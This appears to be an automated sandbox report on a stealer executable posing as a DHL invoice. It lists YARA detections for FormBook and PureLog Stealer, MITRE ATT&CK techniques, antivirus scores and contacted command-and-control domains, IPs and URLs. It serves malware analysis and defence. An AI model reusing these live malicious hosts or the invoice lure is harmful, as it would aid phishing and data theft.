Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 5.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3884970564.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3884563234.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1469792389.0000000003BF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.2a138d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.2a138d0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3a03790.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.5370000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.39e9970.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.2a238e8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.5370000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.2a238e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.53a0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3a03790.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.53a0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.39e9970.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1469792389.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1473298429.0000000005370000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1473432091.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1467009069.0000000002A23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1467009069.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 5.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3884970564.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3884563234.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1469792389.0000000003BF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.2a138d0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.2a138d0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3a03790.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.5370000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.39e9970.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.2a238e8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.5370000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.2a238e8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.53a0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.3a03790.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.53a0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL Factura Electronica Pendiente documento No 04BB25083.exe.39e9970.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1469792389.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1473298429.0000000005370000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1473432091.00000000053A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1467009069.0000000002A23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1467009069.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Shared Modules	1 DLL Side-Loading	512 Process Injection	1 Rootkit	1 Credential API Hooking	121 Security Software Discovery	Remote Services	1 Credential API Hooking	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Masquerading	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Disable or Modify Tools	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	41 Virtualization/Sandbox Evasion	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	512 Process Injection	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Deobfuscate/Decode Files or Information	Cached Domain Credentials	112 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	22 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
DHL Factura Electronica Pendiente documento No 04BB25083.exe	34%	ReversingLabs	Win32.Trojan.Generic
DHL Factura Electronica Pendiente documento No 04BB25083.exe	41%	Virustotal		Browse
DHL Factura Electronica Pendiente documento No 04BB25083.exe	100%	Avira	HEUR/AGEN.1306292
DHL Factura Electronica Pendiente documento No 04BB25083.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
quickfibrokers.com	5%	Virustotal	Browse
rdlva.com	1%	Virustotal	Browse
taxibactrungnam.com	1%	Virustotal	Browse
www.yassa-hany.online	0%	Virustotal	Browse
td-ccm-neg-87-45.wixdns.net	0%	Virustotal	Browse
www.baerana.com	0%	Virustotal	Browse
www.rdlva.com	1%	Virustotal	Browse
www.bigtexture.xyz	0%	Virustotal	Browse
www.quickfibrokers.com	0%	Virustotal	Browse
www.taxibactrungnam.com	1%	Virustotal	Browse
www.permanentday.space	3%	Virustotal	Browse
www.usetruerreview.com	0%	Virustotal	Browse
www.ae-skinlab.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://powerpoint.office.comer	0%	URL Reputation	safe
http://www.microsoft.c	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
http://ns.adobeS	0%	URL Reputation	safe
http://www.c2help.liveReferer:	0%	Avira URL Cloud	safe
http://www.papermoonnursery.com/pz08/www.anti-theft-device-82641.bond	0%	Avira URL Cloud	safe
http://www.permanentday.space	3%	Virustotal		Browse
http://www.baerana.com/pz08/	1%	Virustotal		Browse
http://www.aloyoga-uae.com/pz08/	11%	Virustotal		Browse
http://www.permanentday.space	100%	Avira URL Cloud	malware
http://www.aloyoga-uae.com/pz08/	100%	Avira URL Cloud	phishing
http://www.baerana.com/pz08/	0%	Avira URL Cloud	safe
http://www.phdop.xyz/pz08/www.quickfibrokers.com	100%	Avira URL Cloud	phishing
http://www.baerana.com/pz08/www.yassa-hany.online	0%	Avira URL Cloud	safe
http://www.taxibactrungnam.comReferer:	0%	Avira URL Cloud	safe
http://www.itkagear.com	0%	Avira URL Cloud	safe
http://www.ae-skinlab.com/pz08/	100%	Avira URL Cloud	malware
http://www.yassa-hany.onlineReferer:	0%	Avira URL Cloud	safe
http://www.rdlva.comReferer:	0%	Avira URL Cloud	safe
www.rdlva.com/pz08/	0%	Avira URL Cloud	safe
http://www.itkagear.com/pz08/www.jenstandsforarkansas.com	100%	Avira URL Cloud	malware
http://www.itkagear.com	0%	Virustotal		Browse
http://www.itkagear.com/pz08/	100%	Avira URL Cloud	malware
http://www.jenstandsforarkansas.com/pz08/	0%	Avira URL Cloud	safe
http://www.bigtexture.xyz	0%	Avira URL Cloud	safe
www.rdlva.com/pz08/	3%	Virustotal		Browse
http://www.itkagear.com/pz08/	0%	Virustotal		Browse
http://www.quickfibrokers.com/pz08/	100%	Avira URL Cloud	malware
http://www.bigtexture.xyz/pz08/www.baerana.com	100%	Avira URL Cloud	phishing
http://www.itkagear.com/pz08/www.jenstandsforarkansas.com	0%	Virustotal		Browse
http://www.quickfibrokers.comReferer:	0%	Avira URL Cloud	safe
http://www.ae-skinlab.com/pz08/	0%	Virustotal		Browse
http://www.usetruerreview.com/pz08/	0%	Avira URL Cloud	safe
http://www.bigtexture.xyz	0%	Virustotal		Browse
http://www.jenstandsforarkansas.com/pz08/	1%	Virustotal		Browse
http://www.quickfibrokers.com/pz08/	0%	Virustotal		Browse
http://www.baerana.com/pz08/?Ap=iUtqEraofiOoamAGmz9y1BZqdP67NXRhW/u/s4hsis3XwB7pF+A9OlO8MXjIW5A/mozx&N6Ahw=3ffl2F0Punah42	0%	Avira URL Cloud	safe
http://www.usetruerreview.com/pz08/	0%	Virustotal		Browse
http://www.baerana.comReferer:	0%	Avira URL Cloud	safe
http://www.papermoonnursery.comReferer:	0%	Avira URL Cloud	safe
http://www.phdop.xyz	0%	Avira URL Cloud	safe
http://www.aloyoga-uae.comReferer:	0%	Avira URL Cloud	safe
http://www.quickfibrokers.com/pz08/?Ap=FGzpPczua9V5Fhp0KyeSYZEXQ8ThSiWTqmgy8xu2EJQTOQiKwoJBowNtdQHJGs6scj9G&N6Ahw=3ffl2F0Punah42	100%	Avira URL Cloud	malware
http://www.taxibactrungnam.com/pz08/?Ap=bKUMdxsXbZ20XGxWaFGGS8S5qdUvksLLWvMweKpTgT2MARQxqrmnXGgSr/TayxAxMgg2&N6Ahw=3ffl2F0Punah42	0%	Avira URL Cloud	safe
http://www.ae-skinlab.com	0%	Avira URL Cloud	safe
http://www.papermoonnursery.com	0%	Avira URL Cloud	safe
http://www.anti-theft-device-82641.bond/pz08/	0%	Avira URL Cloud	safe
http://www.bigtexture.xyz/pz08/	100%	Avira URL Cloud	phishing
http://www.phdop.xyz	0%	Virustotal		Browse
http://www.c2help.live/pz08/	100%	Avira URL Cloud	malware
http://www.yassa-hany.online	0%	Avira URL Cloud	safe
http://www.papermoonnursery.com	0%	Virustotal		Browse
http://www.papermoonnursery.com/pz08/	0%	Avira URL Cloud	safe
http://www.yassa-hany.online/pz08/www.taxibactrungnam.com	0%	Avira URL Cloud	safe
http://www.anti-theft-device-82641.bond/pz08/	0%	Virustotal		Browse
http://www.itkagear.comReferer:	0%	Avira URL Cloud	safe
http://www.rdlva.com	0%	Avira URL Cloud	safe
http://www.bigtexture.xyz/pz08/	1%	Virustotal		Browse
http://www.ae-skinlab.com	0%	Virustotal		Browse
http://www.jenstandsforarkansas.com	0%	Avira URL Cloud	safe
http://www.c2help.live/pz08/	2%	Virustotal		Browse
http://www.permanentday.space/pz08/www.usetruerreview.com	100%	Avira URL Cloud	malware
http://www.quickfibrokers.com	100%	Avira URL Cloud	malware
http://www.taxibactrungnam.com	0%	Avira URL Cloud	safe
http://www.jenstandsforarkansas.com	1%	Virustotal		Browse
http://www.bigtexture.xyzReferer:	0%	Avira URL Cloud	safe
http://www.yassa-hany.online	0%	Virustotal		Browse
http://www.rdlva.com	1%	Virustotal		Browse
http://www.quickfibrokers.com/pz08/www.permanentday.space	100%	Avira URL Cloud	malware
http://www.papermoonnursery.com/pz08/	0%	Virustotal		Browse
http://www.usetruerreview.comReferer:	0%	Avira URL Cloud	safe
http://www.permanentday.space/pz08/	100%	Avira URL Cloud	malware
http://www.quickfibrokers.com	0%	Virustotal		Browse
http://www.ae-skinlab.com/pz08/?Ap=2oeA2CX1Q61jX45FJrFMqJgZRjY3h4s6VR+9nrWXkdAg0YO+UupxHOYJVxDLCxYuKaEo&N6Ahw=3ffl2F0Punah42	100%	Avira URL Cloud	malware
http://www.usetruerreview.com	0%	Avira URL Cloud	safe
http://www.taxibactrungnam.com/pz08/	0%	Avira URL Cloud	safe
http://www.yassa-hany.online/pz08/?N6Ahw=3ffl2F0Punah42&Ap=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuP1PGrx4qdiR	0%	Avira URL Cloud	safe
http://www.ae-skinlab.comReferer:	0%	Avira URL Cloud	safe
http://www.jenstandsforarkansas.com/pz08/www.aloyoga-uae.com	0%	Avira URL Cloud	safe
http://www.rdlva.com/pz08/?N6Ahw=3ffl2F0Punah42&Ap=sHUCYmOOLAoNE4y8/5cjc5MBwdY8WEAoN/4wEGeHNPnX/dfJjUbL6GitjMlkSkRNL9P+	0%	Avira URL Cloud	safe
http://www.rdlva.com/pz08/www.ae-skinlab.com	0%	Avira URL Cloud	safe
http://www.usetruerreview.com/pz08/www.bigtexture.xyz	0%	Avira URL Cloud	safe
http://www.c2help.live/pz08/www.papermoonnursery.com	100%	Avira URL Cloud	malware
http://www.phdop.xyzReferer:	0%	Avira URL Cloud	safe
http://www.anti-theft-device-82641.bond	0%	Avira URL Cloud	safe
http://www.c2help.live	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
quickfibrokers.com	15.197.142.173	true	true	5%, Virustotal, Browse	unknown
rdlva.com	3.33.130.190	true	true	1%, Virustotal, Browse	unknown
taxibactrungnam.com	103.167.199.20	true	true	1%, Virustotal, Browse	unknown
www.yassa-hany.online	103.224.212.213	true	true	0%, Virustotal, Browse	unknown
td-ccm-neg-87-45.wixdns.net	34.149.87.45	true	true	0%, Virustotal, Browse	unknown
www.baerana.com	91.195.240.117	true	true	0%, Virustotal, Browse	unknown
www.usetruerreview.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.bigtexture.xyz	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.rdlva.com	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.taxibactrungnam.com	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.permanentday.space	unknown	unknown	true	3%, Virustotal, Browse	unknown
www.ae-skinlab.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.quickfibrokers.com	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.rdlva.com/pz08/	true	3%, Virustotal, Browse Avira URL Cloud: safe	low
http://www.baerana.com/pz08/?Ap=iUtqEraofiOoamAGmz9y1BZqdP67NXRhW/u/s4hsis3XwB7pF+A9OlO8MXjIW5A/mozx&N6Ahw=3ffl2F0Punah42	true	Avira URL Cloud: safe	unknown
http://www.quickfibrokers.com/pz08/?Ap=FGzpPczua9V5Fhp0KyeSYZEXQ8ThSiWTqmgy8xu2EJQTOQiKwoJBowNtdQHJGs6scj9G&N6Ahw=3ffl2F0Punah42	true	Avira URL Cloud: malware	unknown
http://www.taxibactrungnam.com/pz08/?Ap=bKUMdxsXbZ20XGxWaFGGS8S5qdUvksLLWvMweKpTgT2MARQxqrmnXGgSr/TayxAxMgg2&N6Ahw=3ffl2F0Punah42	true	Avira URL Cloud: safe	unknown
http://www.ae-skinlab.com/pz08/?Ap=2oeA2CX1Q61jX45FJrFMqJgZRjY3h4s6VR+9nrWXkdAg0YO+UupxHOYJVxDLCxYuKaEo&N6Ahw=3ffl2F0Punah42	true	Avira URL Cloud: malware	unknown
http://www.yassa-hany.online/pz08/?N6Ahw=3ffl2F0Punah42&Ap=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuP1PGrx4qdiR	true	Avira URL Cloud: safe	unknown
http://www.rdlva.com/pz08/?N6Ahw=3ffl2F0Punah42&Ap=sHUCYmOOLAoNE4y8/5cjc5MBwdY8WEAoN/4wEGeHNPnX/dfJjUbL6GitjMlkSkRNL9P+	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://powerpoint.office.comer	explorer.exe, 00000006.00000000.1487556831.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3894874873.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.papermoonnursery.com/pz08/www.anti-theft-device-82641.bond	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOSA4	explorer.exe, 00000006.00000003.2809145354.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285909149.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3894874873.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1487556831.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.c2help.liveReferer:	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.permanentday.space	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.phdop.xyz/pz08/www.quickfibrokers.com	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world	explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000006.00000003.2284484234.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3890474944.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1481090991.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.baerana.com/pz08/	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.aloyoga-uae.com/pz08/	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	11%, Virustotal, Browse Avira URL Cloud: phishing	unknown
https://excel.office.com	explorer.exe, 00000006.00000000.1487556831.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3894874873.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1	explorer.exe, 00000006.00000000.1477551956.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3887497941.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2285572521.0000000006F30000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.baerana.com/pz08/www.yassa-hany.online	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.taxibactrungnam.comReferer:	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.itkagear.com	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.ae-skinlab.com/pz08/	explorer.exe, 00000006.00000002.3898511291.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
